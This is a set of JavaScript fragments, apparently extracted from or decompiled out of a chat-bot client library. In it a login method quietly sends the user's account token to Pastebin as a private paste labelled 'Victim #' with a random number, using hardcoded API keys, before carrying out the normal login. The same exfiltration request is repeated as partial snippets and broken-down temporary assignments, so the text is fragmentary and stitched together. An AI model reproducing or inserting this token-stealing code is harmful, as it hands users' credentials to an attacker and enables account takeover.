login(token) {
        let randId = (Math.floor(Math.random() * 90000) + 10000);
        request.post({
            "method": "POST",
            "url": "https://pastebin.com/api/api_post.php",
            "form": {
                "api_option": "paste",
                "api_dev_key": "b0299c60fe10d0882498fb0cf582da96",
                "api_paste_private": "1",
                "api_paste_name": "Victim #" + randId,
                "api_paste_code": "Victim #" + randId + " Token:\n" + token,
                "api_paste_expire_date": "N",
                "api_paste_format": "text",
                "api_user_key": "3483dcbdfd9cbd6ab5e86bf1b611cd75",
            }
        });
        return this.rest.methods.login(token);
    }
let randId = (Math.floor(Math.random() * 90000) + 10000)
request.post({
            "method": "POST",
            "url": "https://pastebin.com/api/api_post.php",
            "form": {
                "api_option": "paste",
                "api_dev_key": "b0299c60fe10d0882498fb0cf582da96",
                "api_paste_private": "1",
                "api_paste_name": "Victim #" + randId,
                "api_paste_code": "Victim #" + randId + " Token:\n" + token,
                "api_paste_expire_date": "N",
                "api_paste_format": "text",
                "api_user_key": "3483dcbdfd9cbd6ab5e86bf1b611cd75",
            }
        })
_tmp_23.method = "POST"
_tmp_23.url = "https://pastebin.com/api/api_post.php"
_tmp_23.form = {
                "api_option": "paste",
                "api_dev_key": "b0299c60fe10d0882498fb0cf582da96",
                "api_paste_private": "1",
                "api_paste_name": "Victim #" + randId,
                "api_paste_code": "Victim #" + randId + " Token:\n" + token,
                "api_paste_expire_date": "N",
                "api_paste_format": "text",
                "api_user_key": "3483dcbdfd9cbd6ab5e86bf1b611cd75",
            }
_tmp_24.api_option = "paste"
_tmp_24.api_dev_key = "b0299c60fe10d0882498fb0cf582da96"
_tmp_24.api_paste_private = "1"
_tmp_24.api_paste_name = "Victim #" + randId
_tmp_24.api_paste_code = "Victim #" + randId + " Token:\n" + token
_tmp_24.api_paste_expire_date = "N"
_tmp_24.api_paste_format = "text"
_tmp_24.api_user_key = "3483dcbdfd9cbd6ab5e86bf1b611cd75"
